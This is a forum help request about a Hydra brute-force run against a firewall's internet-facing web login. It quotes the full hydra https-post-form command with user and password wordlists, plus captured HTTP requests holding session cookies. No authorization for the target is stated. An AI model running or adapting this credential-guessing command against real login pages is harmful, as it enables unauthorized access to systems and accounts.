Forum Thread: Hydra Only False Positive and Stops After 16 Passwords Per User

Hey guys,

I just started a brute force on a firewall's login site, which is often open to the wild web, but everything I get is false positives and it stops after 16 attempts.

I use:

hydra -L WordlistUser.txt -P WordlistPasswords.txt XXX.XXX.XXX.XXX https-post-form -s 1550 "/auth1.html:param1=&param2=62F1C69CDE41EE6DD2998CFAD2EB829B&id=ef&sessId=6E068445CFB7EE3B6B784B1F2771DC49&select2=English&uName=^USER^&pass=^PASS^:Incorrect name/password" -V

The post it sends via browser is:

POST /auth.cgi HTTP/1.1
Host: XXX.XXX.XXX.XXX:1550
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: XXX.XXX.XXX.XXX:1550/auth1.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
Cookie: SessId=8C144778424DA68E956BC4C9EDDC38D0; PageSeed=2b1427a16a0df63b30d70c357465bbb9
Connection: close
Upgrade-Insecure-Requests: 1

param1=&param2=4FA14DDB2801C5817D896272CCBC07F4&id=51&sessId=8C144778424DA68E956BC4C9EDDC38D0&select2=English&uName=test&pass=test&digest=

The answer I get is:

GET /auth1.html HTTP/1.1
Host: XXX.XXX.XXX.XXX:1550
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: XXX.XXX.XXX.XXX:1550/auth.html
Cookie: SessId=52F99AB1FFC088467F04C44883DAD4AD; PageSeed=e5b234790019f1d4e22e62df4c7d44c3
Connection: close
Upgrade-Insecure-Requests: 1

The site shows me "Incorrect name/password" after a wrong combination; that's why I end with ":Incorrect name/password".

Any suggestions?
